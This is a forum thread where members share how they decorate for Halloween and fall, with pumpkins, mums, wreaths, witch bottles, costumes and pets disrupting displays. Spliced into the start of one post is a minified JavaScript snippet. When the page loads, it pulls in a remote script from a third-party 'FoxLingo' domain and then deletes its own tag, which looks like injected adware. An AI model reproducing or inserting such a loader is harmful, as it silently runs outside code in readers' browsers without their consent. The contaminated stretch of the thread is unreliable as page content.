I do! I go all out for Fall, both inside and out as I host my family for Thanksgiving dinner. I add some Halloween decorations in October also. I don't go over the top for Halloween, especially with the creepy stuff because I get freaked out too easily. :lol3:

On Halloween night I have jack o' lantern buckets that I put candles in that I line the driveway with. This year I also bought two banners that say " trick" and "treat" that I will put on either side of the door.

Do you decorate? Pics are always appreciated too! :lol3:

Over the river and through the woods...
I don't really decorate although I do usually get a pumpkin or two, and a mum (that usually dies). I tried putting out my mom's cornucopia one year but the cats thought the fake corn and what not were toys so it was pretty much demolished in a matter of hours.

My husband usually decorates a little outside for Halloween but we're not this year since the yard is basically torn because of the addition. He did, however, remember to put this mask on the door. It screams when it detects motion and scares the crap out of me every year. I hide it every year but he always seems to find the dang thing!

This is my favorite season, and Halloween is my favorite holiday.  I don't go overbaord with decorations, but every room has at leat 1 small Halloween/Fall touch--even the 3 bathrooms. I don't go in for creepy, either, but we usually put severed heads around a chopping block, doused with cheap ketchup on the front lawn! (The heads are discarded beauty school practice heads, don't call the cops, ok?)

I live for this time of year!

I'm finishing up my 18th C. robe a la Francaise gown that I plan to wear 4-5 times up to Halloween.  All that is left is hand-sewing, but that's time-consuming. Here's a pic of someone else's, so you can get an idea:

http://www.metmuseum.org/Collections/search-the-collections/80003620  (no, my skirt is MUCH narrower than that!) Imagine trying to use the chamber pot dressed in that thing?!?!

It's my first Halloween in my house! :D I legally owned it last year at Halloween, but didn't move in until the first weekend in Nov.

So far I have some fall colored (fake) flowers on my front step. :anon: :lol3: My parents had pumpkins in their garden, so I need to go get some from them.

With the crew of kitties I have, decorating indoors isn't very likely to happen. :( I so badly want a Christmas tree, but esp. now with Hugo & Holden I don't see that happening.

For Christmas I so badly want one of those huge inflatable snowmen or santas or something. In my small town only the "white trash" (as I was so informed by a nosy old lady at the grocery store) have them in their front yards. I would LOVE to have one just to push buttons! :D :lol3:

Done rambling now.....

I always feel so happy in the month of October!! :pumpkin: The more decorations for Halloween the better. BUT not the creepy, scary stuff - because it creeps me out. :lol3: I LOVE to decorate for Fall as well. But for some reason, I am already getting in the Christmas spirit and feeling like I might go ahead and deck the house out early this year for Christmas. I am hosting Christmas this year for my hubby's family. SO might skip out on some of the Fall decorations this year. Just go straight from Halloween to Christmas. :pumpkin: :santa:

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); When I lived in a house I did. The lady who owned the house lived on the main floor and we each chipped in for candy and decorations, and pranking the kids!  It was such fun.   I absolutely love Halloween.  Unfortunately there isn't any halloweening in my apartment building. Otherwise I'd decorate my door and the hallway around it, and dress up for the kids.

I am going to try and put together some kind of costume for work.  There is a designated day where all of the kids who have had chemotherapy, and their families go around the building halloweening. It's so cute to see them all dressed up in their costumes.

I love to decorate for any holiday but fall/halloween is one of my favorites!  I make a wreath for the big window and put out my garden flag with a black cat sitting on a pumpkin

My son and I always carve a couple of pumpkins right before halloween and put them up on a a hay bale with a Mr. and Mrs. scarecrow.   He loves to decorate so that makes it that much more fun for me.  Even the kitties get in on the action, they love the hay bales!  I don't go for the scary stuff either.

I LOVE decorating for Halloween! (Well, I just love decorating for Fall in general!) I started decorating back in September lol.:lol3: My house is all decked out now and I love it. I like to stick to decorations that I can use both for Halloween and Thanksgiving (so nothing too scary), and I have a few items specific to each of those holidays that I change out.

Nothing this year....no time and no room at home. But since I started making witch bottles, I do like to put a display of them out, both on my hutch at home and in my office at work. I have some pictures from the display last year that I can post when I get home....the bottles turn out nice and it doesn't take much to do them at all.

Along with the bottles, I have a black lace-type door screen (with bats) that I drape over my cabinet here at work. I have a black wooden crate that I decorate with garlands of fall leaves. A black bat (Edgar), a black crow (Allan), and a black rat (Poe).....yes, one of my GFs named them. I made a witch's recipe book from paper mache that I put out. And then I drape it all with purple lights.

On the front of my office door is the grotesque "Double Trouble". He's a two-headed gargoyle-type creature and he hangs by his tail. He doesn't really count, though, because he lives on my door year around. And since my GF named Edgar, Allan, and Poe, they stay out in my office, too. Around here, once it's named, it stays.

We already decorated for Halloween this year! We'll probably still add a few things, but it's been FOUR years since we decorated in October! After my dad died in September three years ago, and then my sister passed away (also in September) a year ago, nobody wanted to put up skeletons and tombstones a few weeks later. But this year we made a day of it and everybody helped out so it was fun.

We don't do Halloween so it's just fall themed stuff around here.  I like to have something for every season or holiday on our front door.  I have a few fall things around the house; but honestly none are up right now.  I need to find my turkey sign I got last year.  I have a fall table cloth that has been on since last year...lol  And I have a wrought iron pumpkin with a little acorn candle in the middle on the table too.  Both have stayed out.  I need something for the rest of the year!  I love fall colors and it's so easy to decorate in the fall.

If I do anything it is more fall oriented. I like to use pumpkins, uncarved and mums. When I have corn planted around me, we use corn stalks and get bales of wheat straw to sit the pumpkins and mums on.

Could we please have some pictures on this thread? I'll start with some pumpkin images, taken on our trip to the US last year. I miss the special fall atmosphere, and would love to share some of it with some pictures here. Sorry these are not about actual homes, but hopefully they're in the right spirit of things.

I don't usually decorate for Halloween, but try to do something fall'ish. sense it's my favorite time of year.

I only have a couple of mums right now, but would like to get more. I haven't carved a pumpkin in a few years, but am planning on doing one this year.

I don't get any trick or treater's where I am, (kind of tucked back, off a street) but will usually buy a bag of candy "just in case."

I just love the fall decorations. If I could spend more, I would have a porch full.  I do want to get a bag of the small decorative pumpkins to try & get some good pictures

of Angel for the contest!
